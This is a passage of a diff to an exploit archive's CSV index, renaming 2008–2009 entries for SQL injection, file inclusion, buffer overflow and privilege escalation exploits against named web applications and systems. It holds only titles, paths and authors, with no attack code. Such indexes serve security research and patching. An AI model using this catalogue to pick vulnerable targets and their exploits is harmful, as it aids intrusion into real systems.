1.13 Remote SQL Injection Vulnerability",2008-11-26,otmorozok428,php,webapps,0 7238,platforms/php/webapps/7238.txt,"Post Affiliate Pro 3 - (umprof_status) Blind SQL Injection Vulnerability",2008-11-26,XaDoS,php,webapps,0 -7239,platforms/php/webapps/7239.txt,"ParsBlogger (blog.asp wr) Remote SQL Injection Vulnerability",2008-11-26,"BorN To K!LL",php,webapps,0 +7239,platforms/php/webapps/7239.txt,"ParsBlogger (blog.asp wr) - Remote SQL Injection Vulnerability",2008-11-26,"BorN To K!LL",php,webapps,0 7240,platforms/php/webapps/7240.txt,"Star Articles 6.0 - Remote Blind SQL Injection Vulnerability",2008-11-26,b3hz4d,php,webapps,0 -7241,platforms/php/webapps/7241.txt,"TxtBlog (index.php m) Local File Inclusion Vulnerability",2008-11-27,"CWH Underground",php,webapps,0 +7241,platforms/php/webapps/7241.txt,"TxtBlog (index.php m) 1.0 Alpha - Local File Inclusion Vulnerability",2008-11-27,"CWH Underground",php,webapps,0 7242,platforms/php/webapps/7242.txt,"web calendar system 3.12/3.30 Multiple Vulnerabilities",2008-11-27,Bl@ckbe@rD,php,webapps,0 7243,platforms/php/webapps/7243.php,"Star Articles 6.0 - Remote Blind SQL Injection exploit",2008-11-27,Stack,php,webapps,0 7244,platforms/php/webapps/7244.txt,"Ocean12 Contact Manager Pro (SQL/XSS/DDV) Multiple Vulnerabilities",2008-11-27,Pouya_Server,php,webapps,0 @@ -6814,7 +6814,7 @@ id,file,description,date,author,platform,type,port 7266,platforms/php/webapps/7266.pl,"All Club CMS <= 0.0.2 - Remote DB Config Retrieve Exploit",2008-11-28,StAkeR,php,webapps,0 7267,platforms/php/webapps/7267.txt,"SailPlanner 0.3a (Auth Bypass) SQL Injection Vulnerability",2008-11-28,JIKO,php,webapps,0 7268,platforms/php/webapps/7268.txt,"Bluo CMS 1.2 (index.php id) Blind SQL Injection Vulnerability",2008-11-28,The_5p3ctrum,php,webapps,0 -7269,platforms/php/webapps/7269.pl,"CMS little (index.php term) Remote SQL Injection Exploit",2008-11-28,"CWH Underground",php,webapps,0 +7269,platforms/php/webapps/7269.pl,"CMS little (index.php term) 0.0.1 - Remote SQL Injection Exploit",2008-11-28,"CWH Underground",php,webapps,0 7270,platforms/php/webapps/7270.txt,"ReVou Twitter Clone (Auth Bypass) SQL Injection Vulnerability",2008-11-28,R3d-D3V!L,php,webapps,0 7271,platforms/php/webapps/7271.txt,"Ocean12 FAQ Manager Pro (ID) Blind SQL Injection Vulnerabillity",2008-11-28,Stack,php,webapps,0 7273,platforms/asp/webapps/7273.txt,"Active Force Matrix 2 - (Auth Bypass) Remote SQL Injection Vulnerability",2008-11-29,R3d-D3V!L,asp,webapps,0 @@ -6848,8 +6848,8 @@ id,file,description,date,author,platform,type,port 7301,platforms/php/webapps/7301.txt,"Active Time Billing 3.2 (Auth Bypass) SQL Injection Vulnerability",2008-11-30,AlpHaNiX,php,webapps,0 7302,platforms/php/webapps/7302.txt,"Active Business Directory 2 - Remote blind SQL Injection Vulnerability",2008-11-30,AlpHaNiX,php,webapps,0 7303,platforms/php/webapps/7303.txt,"Quick Tree View .NET 3.1 (qtv.mdb) Database Disclosure Vulnerability",2008-11-30,Cyber-Zone,php,webapps,0 -7304,platforms/php/webapps/7304.pl,"KTP Computer Customer Database CMS Local File Inclusion Vulnerability",2008-11-30,"CWH Underground",php,webapps,0 -7305,platforms/php/webapps/7305.txt,"KTP Computer Customer Database CMS Blind SQL Injection Vulnerability",2008-11-30,"CWH Underground",php,webapps,0 +7304,platforms/php/webapps/7304.pl,"KTP Computer Customer Database CMS 1.0 - Local File Inclusion Vulnerability",2008-11-30,"CWH Underground",php,webapps,0 +7305,platforms/php/webapps/7305.txt,"KTP Computer Customer Database CMS 1.0 - Blind SQL Injection Vulnerability",2008-11-30,"CWH Underground",php,webapps,0 7306,platforms/php/webapps/7306.txt,"minimal ablog 0.4 (sql/fu/bypass) Multiple Vulnerabilities",2008-11-30,NoGe,php,webapps,0 7307,platforms/windows/dos/7307.txt,"Electronics Workbench (EWB File) Local Stack Overflow PoC",2008-11-30,Zigma,windows,dos,0 7308,platforms/php/webapps/7308.txt,"cpCommerce 1.2.6 (URL Rewrite) Input variable overwrite / Auth bypass",2008-11-30,girex,php,webapps,0 @@ -6867,7 +6867,7 @@ id,file,description,date,author,platform,type,port 7322,platforms/php/webapps/7322.pl,"CMS MAXSITE Component Guestbook Remote Command Execution Exploit",2008-12-02,"CWH Underground",php,webapps,0 7323,platforms/php/webapps/7323.txt,"SunByte e-Flower (id) Remote SQL Injection Vulnerability",2008-12-02,w4rl0ck,php,webapps,0 7324,platforms/php/webapps/7324.txt,"Rapid Classified 3.1 (cldb.mdb) Database Disclosure Vulnerability",2008-12-02,CoBRa_21,php,webapps,0 -7325,platforms/asp/webapps/7325.txt,"Codefixer MailingListPro (MailingList.mdb) Database Disclosure Vuln",2008-12-02,AlpHaNiX,asp,webapps,0 +7325,platforms/asp/webapps/7325.txt,"Codefixer MailingListPro (MailingList.mdb) - Database Disclosure Vuln",2008-12-02,AlpHaNiX,asp,webapps,0 7326,platforms/asp/webapps/7326.txt,"Gallery MX 2.0.0 (pics_pre.asp ID) Blind SQL Injection Vulnerability",2008-12-03,R3d-D3V!L,asp,webapps,0 7327,platforms/asp/webapps/7327.txt,"Calendar MX Professional 2.0.0 - Blind SQL Injection Vulnerability",2008-12-03,R3d-D3V!L,asp,webapps,0 7328,platforms/php/webapps/7328.pl,"Check New 4.52 (findoffice.php search) Remote SQL Injection Exploit",2008-12-03,"CWH Underground",php,webapps,0 @@ -7283,7 +7283,7 @@ id,file,description,date,author,platform,type,port 7743,platforms/php/webapps/7743.txt,"Realtor 747 (define.php INC_DIR) Remote File Inclusion Vulnerability",2009-01-12,ahmadbady,php,webapps,0 7744,platforms/asp/webapps/7744.txt,"Virtual GuestBook 2.1 - Remote Database Disclosure Vulnerability",2009-01-13,Moudi,asp,webapps,0 7745,platforms/windows/local/7745.py,"VUPlayer 2.49 - .ASX File (Universal) Local Buffer Overflow Exploit",2009-01-13,"Encrypt3d.M!nd ",windows,local,0 -7746,platforms/php/webapps/7746.txt,"Joomla Component com_gigcal (gigcal_gigs_id) SQL Injection Vuln",2009-01-13,boom3rang,php,webapps,0 +7746,platforms/php/webapps/7746.txt,"Joomla Component com_gigcal (gigcal_gigs_id) 1.0 - SQL Injection",2009-01-13,boom3rang,php,webapps,0 7747,platforms/windows/remote/7747.html,"Word Viewer OCX 3.2 ActiveX (Save) Remote File Overwrite Exploit",2009-01-13,Houssamix,windows,remote,0 7748,platforms/windows/remote/7748.html,"Office Viewer ActiveX Control 3.0.1 (Save) Remote File Overwrite Exploit",2009-01-13,Houssamix,windows,remote,0 7749,platforms/windows/remote/7749.html,"Office Viewer ActiveX Control 3.0.1 - Remote File Execution Exploit",2009-01-13,Houssamix,windows,remote,0 @@ -7508,7 +7508,7 @@ id,file,description,date,author,platform,type,port 7978,platforms/php/webapps/7978.txt,"rgboard 4 5p1 (07.07.27) - Multiple Vulnerabilities",2009-02-04,make0day,php,webapps,0 7979,platforms/php/webapps/7979.txt,"GRBoard 1.8 - Multiple Remote File Inclusion Vulnerabilities",2009-02-04,make0day,php,webapps,0 7980,platforms/php/webapps/7980.pl,"PHPbbBook 1.3 (bbcode.php l) Local File Inclusion Exploit",2009-02-04,Osirys,php,webapps,0 -7981,platforms/asp/webapps/7981.txt,"Power System Of Article Management (DD/XSS) Vulnerabilities",2009-02-04,Pouya_Server,asp,webapps,0 +7981,platforms/asp/webapps/7981.txt,"Power System Of Article Management 3.0 - (DD/XSS) Vulnerabilities",2009-02-04,Pouya_Server,asp,webapps,0 7982,platforms/asp/webapps/7982.txt,"team 1.x (dd/xss) Multiple Vulnerabilities",2009-02-04,Pouya_Server,asp,webapps,0 7984,platforms/php/webapps/7984.pl,"YapBB <= 1.2 (forumID) Blind SQL Injection Exploit",2009-02-04,darkjoker,php,webapps,0 7985,platforms/windows/dos/7985.pl,"Novell GroupWise <= 8.0 Malformed RCPT command Off-by-one Exploit",2009-02-04,"Praveen Darshanam",windows,dos,0 @@ -7528,7 +7528,7 @@ id,file,description,date,author,platform,type,port 7999,platforms/php/webapps/7999.pl,"Simple PHP News 1.0 - Remote Command Execution Exploit",2009-02-06,Osirys,php,webapps,0 8000,platforms/php/webapps/8000.txt,"zeroboard4 pl8 (07.12.17) Multiple Vulnerabilities",2009-02-06,make0day,php,webapps,0 8001,platforms/php/webapps/8001.txt,"Mailist 3.0 Insecure Backup/Local File Inclusion Vulnerabilities",2009-02-06,SirGod,php,webapps,0 -8002,platforms/php/webapps/8002.txt,"CafeEngine (index.php catid) Remote SQL Injection Vulnerability",2009-02-06,SuNHouSe2,php,webapps,0 +8002,platforms/php/webapps/8002.txt,"CafeEngine - (index.php catid) Remote SQL Injection Vulnerability",2009-02-06,SuNHouSe2,php,webapps,0 8003,platforms/php/webapps/8003.pl,"1024 CMS <= 1.4.4 - Remote Command Execution with RFI (c99) Exploit",2009-02-06,JosS,php,webapps,0 8004,platforms/php/webapps/8004.txt,"SilverNews 2.04 (Auth Bypass/LFI/RCE) Multiple Vulnerabilities",2009-02-06,x0r,php,webapps,0 8005,platforms/php/webapps/8005.txt,"phpYabs 0.1.2 (Azione) Remote File Inclusion Vulnerability",2009-02-06,Arka69,php,webapps,0 @@ -9106,7 +9106,7 @@ id,file,description,date,author,platform,type,port 9645,platforms/aix/local/9645.sh,"IBM AIX 5.6/6.1 - _LIB_INIT_DBG Arbitrary File Overwrite via Libc Debug",2009-09-11,"Marco Ivaldi",aix,local,0 9646,platforms/hardware/dos/9646.php,"Siemens Gigaset SE361 WLAN Remote Reboot Exploit",2009-09-11,crashbrz,hardware,dos,0 9647,platforms/php/webapps/9647.txt,"PHP-IPNMonitor (maincat_id) Remote SQL Injection Vulnerability",2009-09-11,noname,php,webapps,0 -9648,platforms/php/webapps/9648.txt,"Joomla Hotel Booking System XSS/SQL Injection Multiple Vulnerabilities",2009-09-11,K-159,php,webapps,0 +9648,platforms/php/webapps/9648.txt,"Joomla Hotel Booking System - XSS/SQL Injection Multiple Vulnerabilities",2009-09-11,K-159,php,webapps,0 9649,platforms/windows/remote/9649.txt,"Xerver HTTP Server 4.32 Arbitrary Source Code Disclosure Vuln",2009-09-11,Dr_IDE,windows,remote,0 9650,platforms/windows/remote/9650.txt,"Kolibri+ Web Server 2 Remote Arbitrary Source Code Disclosure #2",2009-09-11,Dr_IDE,windows,remote,0 9651,platforms/multiple/remote/9651.txt,"Mozilla Firefox < 3.0.14 Multiplatform RCE via pkcs11.addmodule",2009-09-11,"Dan Kaminsky",multiple,remote,0 @@ -9149,11 +9149,11 @@ id,file,description,date,author,platform,type,port 9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 GET Request Remote BOF Exploit (SEH) Universal",2009-09-15,hack4love,windows,remote,6660 9691,platforms/windows/dos/9691.pl,"DJ Studio Pro 4.2 (.PLS file) Local Crash Exploit",2009-09-15,prodigy,windows,dos,0 9692,platforms/php/webapps/9692.txt,"iBoutique.MALL 1.2 (cat) Remote Blind SQL Injection Vulnerability",2009-09-15,InjEctOr5,php,webapps,0 -9693,platforms/php/webapps/9693.txt,"Joomla Component com_djcatalog SQL/bSQL Injection Vulnerabilities",2009-09-15,"Chip d3 bi0s",php,webapps,0 +9693,platforms/php/webapps/9693.txt,"Joomla Component com_djcatalog - SQL/bSQL Injection Vulnerabilities",2009-09-15,"Chip d3 bi0s",php,webapps,0 9694,platforms/windows/remote/9694.txt,"NaviCOPA Web Server 3.01 Remote Source Code Disclosure Vulnerability",2009-09-16,Dr_IDE,windows,remote,0 9695,platforms/windows/dos/9695.py,"BigAnt Server 2.50 SP1 (ZIP File) Local Buffer Overflow PoC",2009-09-16,Dr_IDE,windows,dos,0 9696,platforms/php/webapps/9696.txt,"AdsDX 3.05 (Auth Bypass) Remote SQL Injection Vulnerability",2009-09-16,snakespc,php,webapps,0 -9697,platforms/php/webapps/9697.txt,"Joomla com_foobla_suggestions (idea_id) SQL Injection Vulnerability",2009-09-16,"Chip d3 bi0s",php,webapps,0 +9697,platforms/php/webapps/9697.txt,"Joomla com_foobla_suggestions (idea_id) 1.5.11 - SQL Injection Vulnerability",2009-09-16,"Chip d3 bi0s",php,webapps,0 9698,platforms/php/webapps/9698.pl,"Joomla Component com_jlord_rss (id) Blind SQL Injection Exploit",2009-09-16,"Chip d3 bi0s",php,webapps,0 9699,platforms/php/webapps/9699.txt,"microcms 3.5 (sql/lfi) Multiple Vulnerabilities",2009-09-16,"learn3r hacker",php,webapps,0 9700,platforms/php/webapps/9700.rb,"Saphplesson 4.3 - Remote Blind SQL Injection Exploit",2009-09-16,"Jafer Al Zidjali",php,webapps,0 @@ -9177,9 +9177,9 @@ id,file,description,date,author,platform,type,port 9718,platforms/multiple/remote/9718.txt,"Xerver HTTP Server 4.32 - XSS / Directory Traversal Vulnerability",2009-09-18,Stack,multiple,remote,0 9719,platforms/multiple/webapps/9719.txt,"FanUpdate 2.2.1 show-cat.php SQL Injection Vulnerability",2009-09-18,"(In)Security Romania",multiple,webapps,0 9720,platforms/multiple/webapps/9720.txt,"FSphp 0.2.1 - Multiple Remote File Inclusion Vulnerabilities",2009-09-18,NoGe,multiple,webapps,0 -9721,platforms/multiple/webapps/9721.txt,"Joomla com_surveymanager SQL injection vulnerability - (stype)",2009-09-21,kaMtiEz,multiple,webapps,0 +9721,platforms/multiple/webapps/9721.txt,"Joomla com_surveymanager 1.5.0 - SQL Injection Vulnerability (stype)",2009-09-21,kaMtiEz,multiple,webapps,0 9722,platforms/multiple/webapps/9722.txt,"DDL CMS 1.0 - Multiple Remote File Inclusion Vulnerabilities",2009-09-21,HxH,multiple,webapps,0 -9723,platforms/multiple/webapps/9723.txt,"Joomla com_jbudgetsmagic SQL injection vulnerability - (bid)",2009-09-21,kaMtiEz,multiple,webapps,0 +9723,platforms/multiple/webapps/9723.txt,"Joomla com_jbudgetsmagic 0.3.2 - 0.4.0 - SQL Injection Vulnerability(bid)",2009-09-21,kaMtiEz,multiple,webapps,0 9724,platforms/multiple/webapps/9724.txt,"BAnner ROtation System mini Multiple Remote File Inclusion",2009-09-21,"EA Ngel",multiple,webapps,0 9726,platforms/multiple/webapps/9726.py,"cP Creator 2.7.1 - Remote SQL Injection",2009-09-21,"Sina Yazdanmehr",multiple,webapps,0 9727,platforms/multiple/webapps/9727.txt,"CMScontrol (Content Management Portal Solutions) SQL Injection",2009-09-21,ph1l1ster,multiple,webapps,0 @@ -9187,8 +9187,8 @@ id,file,description,date,author,platform,type,port 9729,platforms/multiple/webapps/9729.txt,"Loggix Project <= 9.4.5 - Multiple Remote File Include Vulnerability",2009-09-21,"cr4wl3r ",multiple,webapps,0 9730,platforms/multiple/webapps/9730.txt,"WX Guestbook 1.1.208 SQLi and persistent XSS",2009-09-21,learn3r,multiple,webapps,0 9731,platforms/multiple/dos/9731.txt,"Snort unified 1 IDS Logging Alert Evasion, Logfile Corruption/Alert Falsify",2009-09-21,"Pablo Rincón Crespo",multiple,dos,0 -9732,platforms/multiple/webapps/9732.txt,"Joomla component com_jinc (newsid) Blind SQL Injection Vulnerability",2009-09-21,"Chip d3 bi0s",multiple,webapps,0 -9733,platforms/multiple/webapps/9733.pl,"Joomla component com_mytube (user_id) Blind SQL Injection Vulnerability",2009-09-21,"Chip d3 bi0s",multiple,webapps,0 +9732,platforms/multiple/webapps/9732.txt,"Joomla component com_jinc 0.2 - (newsid) Blind SQL Injection Vulnerability",2009-09-21,"Chip d3 bi0s",multiple,webapps,0 +9733,platforms/multiple/webapps/9733.pl,"Joomla component com_mytube (user_id) 1.0 Beta - Blind SQL Injection Vulnerability",2009-09-21,"Chip d3 bi0s",multiple,webapps,0 9734,platforms/windows/dos/9734.py,"BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2",2009-09-21,Dr_IDE,windows,dos,0 9800,platforms/windows/remote/9800.cpp,"Serv-u web client 9.0.0.5 buffer overflow",2009-11-05,"Megumi Yanagishita",windows,remote,80 9801,platforms/php/webapps/9801.txt,"FlatPress 0.804 - 0.812.1 - Local File Inclusion vulnerability",2009-09-29,"Giuseppe Fuggiano",php,webapps,0 @@ -9201,7 +9201,7 @@ id,file,description,date,author,platform,type,port 9809,platforms/asp/webapps/9809.txt,"HEAT Call Logging 8.01 SQL Injection",2009-09-28,"0 0",asp,webapps,0 9810,platforms/windows/remote/9810.txt,"EnjoySAP 6.4, 7.1 - File Overwrite",2009-09-28,sh2kerr,windows,remote,0 9811,platforms/windows/dos/9811.py,"Core FTP Server 1.0 build 304 DoS",2009-09-28,Dr_IDE,windows,dos,21 -9812,platforms/php/webapps/9812.txt,"Joomla IRCm Basic SQL Injection",2009-09-28,kaMtiEz,php,webapps,0 +9812,platforms/php/webapps/9812.txt,"Joomla IRCm Basic - SQL Injection",2009-09-28,kaMtiEz,php,webapps,0 9813,platforms/windows/remote/9813.txt,"Mereo Web Server 1.8 - Remote Source Code Disclosure",2009-09-25,Dr_IDE,windows,remote,80 9814,platforms/windows/remote/9814.py,"CDBurnerXP 4.2.4.1351",2009-09-25,Dr_IDE,windows,remote,0 9815,platforms/windows/remote/9815.py,"Core FTP LE 2.1 build 1612 local buffer overflow PoC",2009-09-25,Dr_IDE,windows,remote,0 @@ -9213,7 +9213,7 @@ id,file,description,date,author,platform,type,port 9821,platforms/php/webapps/9821.txt,"FSphp 0.2.1 - Remote File Inclusion",2009-09-24,NoGe,php,webapps,0 9822,platforms/php/webapps/9822.txt,"Joomla Fastball component 1.1.0-1.2 - SQL Injection",2009-09-24,kaMtiEz,php,webapps,0 9823,platforms/solaris/dos/9823.c,"Sun Solaris 10 RPC dmispd DoS",2009-09-24,"Jeremy Brown",solaris,dos,0 -9824,platforms/php/webapps/9824.txt,"Swiss Mango CMS SQL Injection",2009-09-24,kaMtiEz,php,webapps,0 +9824,platforms/php/webapps/9824.txt,"Swiss Mango CMS - SQL Injection",2009-09-24,kaMtiEz,php,webapps,0 9825,platforms/php/webapps/9825.txt,"e107 0.7.16 Referer header xss",2009-09-24,MustLive,php,webapps,0 9826,platforms/php/webapps/9826.txt,"MindSculpt CMS SQL Injection",2009-09-24,kaMitEz,php,webapps,0 9827,platforms/multiple/webapps/9827.py,"html2ps 1.0 beta5 file disclosure",2009-09-24,epiphant,multiple,webapps,0 @@ -9222,7 +9222,7 @@ id,file,description,date,author,platform,type,port 9830,platforms/php/webapps/9830.txt,"Cour Supreme SQL Injection",2009-09-23,"CrAzY CrAcKeR",php,webapps,0 9831,platforms/windows/local/9831.txt,"Avast Antivirus 4.8.1351.0 DoS and Privilege Escalation",2009-09-23,Evilcry,windows,local,0 9832,platforms/php/webapps/9832.txt,"Joomla/Mambo Tupinambis SQL Injection",2009-09-22,"Don Tukulesto",php,webapps,0 -9833,platforms/php/webapps/9833.txt,"Joomla com_facebook SQL Injection",2009-09-22,kaMtiEz,php,webapps,0 +9833,platforms/php/webapps/9833.txt,"Joomla com_facebook - SQL Injection",2009-09-22,kaMtiEz,php,webapps,0 9834,platforms/asp/webapps/9834.txt,"BPLawyerCaseDocuments SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0 9835,platforms/php/webapps/9835.txt,"HB CMS 1.7 - SQL Injection",2009-09-22,"Securitylab Security Research",php,webapps,0 9836,platforms/php/webapps/9836.txt,"BPMusic 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",php,webapps,0 @@ -9233,7 +9233,7 @@ id,file,description,date,author,platform,type,port 9841,platforms/asp/webapps/9841.txt,"BPHolidayLettings 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0 9842,platforms/php/local/9842.txt,"PHP 5.3.0 pdflib Arbitrary File Write",2009-11-06,"Sina Yazdanmehr",php,local,0 9843,platforms/multiple/remote/9843.txt,"Blender 2.34, 2.35a, 2.4, 2.49b .blend File Command Injection",2009-11-05,"Core Security",multiple,remote,0 -9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privelege Escalation",2009-11-05,"Matthew Bergin",linux,local,0 +9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 - Pipe.c Privelege Escalation",2009-11-05,"Matthew Bergin",linux,local,0 9845,platforms/osx/local/9845.c,"OSX 10.5.6-10.5.7 ptrace mutex DoS",2009-11-05,prdelka,osx,local,0 9846,platforms/php/webapps/9846.txt,"Endonessia CMS 8.4 Loccal File Inclusion",2009-11-04,s4r4d0,php,webapps,0 9847,platforms/php/webapps/9847.txt,"Portili Personal and Team Wiki <= 1.14 - Multiple Vulnerabilities",2009-11-04,Abysssec,php,webapps,0 @@ -9390,9 +9390,9 @@ id,file,description,date,author,platform,type,port 10013,platforms/jsp/webapps/10013.txt,"Hyperic HQ 3.2 - 4.2-beta1 - Multiple XSS",2009-10-02,CoreLabs,jsp,webapps,0 10014,platforms/multiple/dos/10014.txt,"IPsec-Tools Prior to 0.7.2 - Multiple Remote Denial of Service Vulnerabilities",2009-11-09,mu-b,multiple,dos,0 10015,platforms/multiple/remote/10015.txt,"ISC DHCP 'dhclient' 'script_write_params()' - Stack Buffer Overflow Vulnerability",2009-11-10,"Jon Oberheide",multiple,remote,67 -10016,platforms/php/webapps/10016.pl,"JForJoomla JReservation Joomla! Component - 'pid' Parameter SQL Injection Vulnerability",2009-11-10,"Chip d3 bi0s",php,webapps,0 +10016,platforms/php/webapps/10016.pl,"JForJoomla JReservation Joomla! Component 1.5 - 'pid' Parameter SQL Injection Vulnerability",2009-11-10,"Chip d3 bi0s",php,webapps,0 10017,platforms/linux/dos/10017.c,"Linux Kernel 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty",2009-11-09,"David Howells",linux,dos,0 -10018,platforms/linux/local/10018.sh,"Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability",2009-11-12,"Earl Chew",linux,local,0 +10018,platforms/linux/local/10018.sh,"Linux Kernel 'pipe.c' - Local Privilege Escalation Vulnerability",2009-11-12,"Earl Chew",linux,local,0 10019,platforms/linux/remote/10019.rb,"Borland Interbase 2007, 2007 SP2 open_marker_file Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050 10020,platforms/linux/remote/10020.rb,"Borland InterBase 2007, 2007 sp2 jrd8_create_database Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050 10021,platforms/linux/remote/10021.rb,"Borland Interbase 2007, 2007SP2 INET_connect Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050 @@ -9434,7 +9434,7 @@ id,file,description,date,author,platform,type,port 10060,platforms/linux/local/10060.sh,"Geany .18 Local File Overwrite",2009-10-06,"Jeremy Brown",linux,local,0 10061,platforms/jsp/webapps/10061.txt,"McAfee Network Security Manager < 5.1.11.8.1 - Multiple Cross Site Scripting Vulnerabilities",2009-11-12,"Daniel King",jsp,webapps,0 10062,platforms/windows/dos/10062.py,"Novell eDirectory 883ftf3 nldap module Denial of Service",2009-11-16,ryujin,windows,dos,389 -10064,platforms/php/webapps/10064.txt,"Joomla CB Resume Builder SQL Injection",2009-10-05,kaMtiEz,php,webapps,0 +10064,platforms/php/webapps/10064.txt,"Joomla CB Resume Builder - SQL Injection",2009-10-05,kaMtiEz,php,webapps,0 10067,platforms/php/webapps/10067.txt,"Joomla Soundset 1.0 - SQL Injection",2009-10-05,kaMtiEz,php,webapps,0 10068,platforms/windows/dos/10068.rb,"Microsoft Windows 2000-2008 Embedded OpenType Font Engine Remote Code Execution",2009-11-12,"H D Moore",windows,dos,0 10069,platforms/php/webapps/10069.php,"Empire CMS 47 SQL Injection",2009-10-05,"Securitylab Security Research",php,webapps,0 @@ -9677,7 +9677,7 @@ id,file,description,date,author,platform,type,port 10403,platforms/php/webapps/10403.txt,"Uploadscript 1.0 - Multiple Vulnerabilities",2009-12-13,Mr.aFiR,php,webapps,0 10404,platforms/php/webapps/10404.txt,"Interspire Shopping Cart Full Path Disclosure",2009-12-13,Mr.aFiR,php,webapps,0 10406,platforms/php/webapps/10406.txt,"AccStatistics 1.1 - CSRF Vulnerability (Change Admin Settings)",2009-12-13,"Milos Zivanovic ",php,webapps,0 -10407,platforms/php/webapps/10407.txt,"Joomla Component com_virtuemart SQL injection vulnerability (product_id)",2009-12-13,"SOA Crew",php,webapps,0 +10407,platforms/php/webapps/10407.txt,"Joomla Component com_virtuemart 1.0 - SQL Injection Vulnerability (product_id)",2009-12-13,"SOA Crew",php,webapps,0 10408,platforms/php/webapps/10408.txt,"SpireCMS 2.0 - SQL Injection Vulnerability",2009-12-13,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10410,platforms/php/webapps/10410.txt,"phpldapadmin Local File Inclusion",2009-12-10,ipsecs,php,webapps,0 10412,platforms/php/webapps/10412.txt,"Acc PHP eMail 1.1 - CSRF",2009-12-13,bi0,php,webapps,0 @@ -9763,7 +9763,7 @@ id,file,description,date,author,platform,type,port 10510,platforms/hardware/remote/10510.txt,"Cisco ASA <= 8.x VPN SSL module Clientless URL-list control bypass",2009-12-17,"David Eduardo Acosta Rodriguez",hardware,remote,0 10511,platforms/php/webapps/10511.txt,"PHP F1 Upload Shell Upload Vulnerability",2009-12-17,"wlhaan hacker",php,webapps,0 10512,platforms/php/webapps/10512.txt,"Horde 3.3.5 - ""PHP_SELF"" XSS vulnerability",2009-12-17,"Juan Galiana Lara",php,webapps,0 -10513,platforms/windows/webapps/10513.txt,"Authentication bypass and file manipulation in Sitecore Staging Module 5.4.0",2009-12-17,"L. Weichselbaum",windows,webapps,0 +10513,platforms/windows/webapps/10513.txt,"Sitecore Staging Module 5.4.0 - Authentication bypass and File Manipulation",2009-12-17,"L. Weichselbaum",windows,webapps,0 10514,platforms/windows/webapps/10514.txt,"dblog (dblog.mdb) Remote Database Disclosure Vulnerability",2009-12-17,"AnTi SeCuRe",windows,webapps,0 10515,platforms/php/webapps/10515.txt,"Basic PHP Events Lister 2 Add Admin Exploit",2009-12-17,RENO,php,webapps,0 10516,platforms/php/webapps/10516.txt,"Jobscript4Web 3.5 - Multiple CSRF Vulnerability",2009-12-17,bi0,php,webapps,0 @@ -9812,8 +9812,8 @@ id,file,description,date,author,platform,type,port 10571,platforms/php/webapps/10571.txt,"PacketFence Network Access Controller XSS vulnerability",2009-12-20,K053,php,webapps,0 10572,platforms/php/webapps/10572.txt,"4images 1.7.1 - Remote SQL Injection Vulnerability",2009-12-20,"Master Mind",php,webapps,0 10573,platforms/asp/webapps/10573.txt,"8pixel.net 2009. Database Disclosure Vulnerability",2009-12-20,LionTurk,asp,webapps,0 -10574,platforms/php/webapps/10574.txt,"phUploader Remote File Upload Vulnerability",2009-12-20,wlhaan-hacker,php,webapps,0 -10575,platforms/php/webapps/10575.txt,"Drumbeat CMS SQL Injection Exploit",2009-12-21,Sora,php,webapps,0 +10574,platforms/php/webapps/10574.txt,"phUploader 2 - Remote File Upload Vulnerability",2009-12-20,wlhaan-hacker,php,webapps,0 +10575,platforms/php/webapps/10575.txt,"Drumbeat CMS 1.0 - SQL Injection Exploit",2009-12-21,Sora,php,webapps,0 10576,platforms/asp/webapps/10576.txt,"Angelo-emlak 1.0 - Database Disclosure Vulnerability",2009-12-21,LionTurk,asp,webapps,0 10577,platforms/windows/local/10577.pl,"PlayMeNow Malformed M3U Playlist Buffer Overflow(SEH)",2009-12-21,"ThE g0bL!N",windows,local,0 10578,platforms/php/webapps/10578.txt,"Ultimate Uploader 1.3 - Remote File Upload Vulnerability",2009-12-21,"Master Mind",php,webapps,0 @@ -9823,7 +9823,7 @@ id,file,description,date,author,platform,type,port 10583,platforms/php/webapps/10583.txt,"social web cms <= beta 2 - Multiple Vulnerabilities",2009-12-21,"cp77fk4r ",php,webapps,0 10584,platforms/php/webapps/10584.txt,"PHPhotoalbum Remote File Upload Vulnerability",2009-12-21,"wlhaan hacker",php,webapps,0 10585,platforms/php/webapps/10585.txt,"webCocoon's simpleCMS SQL Injection Vulnerability",2009-12-21,_ÝNFAZCI_,php,webapps,0 -10586,platforms/php/webapps/10586.txt,"VideoCMS SQL Injection Vulnerability",2009-12-21,kaMtiEz,php,webapps,0 +10586,platforms/php/webapps/10586.txt,"VideoCMS 3.1 - SQL Injection Vulnerability",2009-12-21,kaMtiEz,php,webapps,0 10587,platforms/php/webapps/10587.txt,"Joomla Component com_jcalpro 1.5.3.6 - Remote File Inclusion",2009-12-13,kaMtiEz,php,webapps,0 10588,platforms/php/webapps/10588.txt,"PDQ Script <= 1.0 - (listingid) SQL Injection",2009-12-21,SecurityRules,php,webapps,0 10590,platforms/php/webapps/10590.txt,"PHPhotoalbum 0.5 - SQL Injection Vulnerability",2009-12-21,Stack,php,webapps,0 @@ -9925,7 +9925,7 @@ id,file,description,date,author,platform,type,port 10706,platforms/php/webapps/10706.txt,"MyCart shopping cart Upload Shell Vulnerability",2009-12-26,indoushka,php,webapps,0 10707,platforms/php/webapps/10707.txt,"oscommerce <= 2.2rc2a Bypass/Create and Download Backup Vulnerability",2009-12-26,indoushka,php,webapps,0 10708,platforms/php/webapps/10708.txt,"MyShoutPro 1.2 Final - Cross Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0 -10710,platforms/php/webapps/10710.txt,"Green Desktiny - Customer Support Helpdesk SQL injection vulnerability",2009-12-26,kaMtiEz,php,webapps,0 +10710,platforms/php/webapps/10710.txt,"Green Desktiny - Customer Support Helpdesk 2.3.1 - SQL Injection Vulnerability",2009-12-26,kaMtiEz,php,webapps,0 10711,platforms/php/webapps/10711.txt,"PHPAUCTION Cross Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0 